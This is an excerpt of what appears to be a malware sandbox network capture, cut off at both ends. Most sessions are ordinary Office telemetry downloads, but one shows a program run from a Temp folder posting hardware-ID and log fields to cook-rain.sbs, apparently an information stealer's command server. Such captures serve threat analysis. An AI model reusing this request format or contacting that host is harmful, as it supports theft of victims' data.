                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:55 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111055Z-178bfbc474bgvl54hC1NYCsfuw00000001b0000000008yhz
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            137192.168.2.44990013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:55 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 15687058-401e-005b-477d-3b9c0c000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111055Z-1777c6cb754mqztshC1TEB4mkc0000000b1g000000008kac
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            138192.168.2.44990713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:56 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:56 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 9616670f-801e-008c-16a7-3b7130000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111056Z-r1d97b99577gg97qhC1TEBcrf40000000a700000000002kh
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            139192.168.2.44990913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:56 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111057Z-178bfbc474btvfdfhC1NYCa2en00000001k000000000115n
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            140192.168.2.449912188.114.96.34432896C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:56 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QXWK23UU8353P8NM39
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 8790
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:56 UTC8790OUTData Raw: 2d 2d 51 58 57 4b 32 33 55 55 38 33 35 33 50 38 4e 4d 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 51 58 57 4b 32 33 55 55 38 33 35 33 50 38 4e 4d 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 58 57 4b 32 33 55 55 38 33 35 33 50 38 4e 4d 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                                                                            Data Ascii: --QXWK23UU8353P8NM39Content-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--QXWK23UU8353P8NM39Content-Disposition: form-data; name="pid"2--QXWK23UU8353P8NM39Content-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bq1gm7bbav3oqt3a23gp53h5tv; expires=Mon, 17-Mar-2025 04:57:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1VAQM8FyvTtfz5VDxguJduVOLXUbNjElkEQKQ0gOd309OmPE50tVj%2BUhdoVRtk49cfU64cjifj23qP1nNy53VZNTxoBp%2FgcLvzoU%2F49BSKUaG1s74Y%2FZPflE7VE87AH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c763c19335a-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1812&sent=10&recv=15&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9726&delivery_rate=1556503&cwnd=232&unsent_bytes=0&cid=ee008635c1a6bd74&ts=1016&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            141192.168.2.44991013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1407
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111057Z-1777c6cb754dqf99hC1TEB5nps0000000at000000000e5uy
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            142192.168.2.44991113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1370
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: a4032f19-b01e-0084-598d-3bd736000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111057Z-1777c6cb7542p5p4hC1TEBq0980000000b3g0000000001pe
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            143192.168.2.44991313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1f0666f4-801e-007b-6865-3be7ab000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111057Z-178bfbc474bkvpdnhC1NYCuu2w00000001fg0000000064bz
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:57 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            144192.168.2.449917184.28.90.27443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:58 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
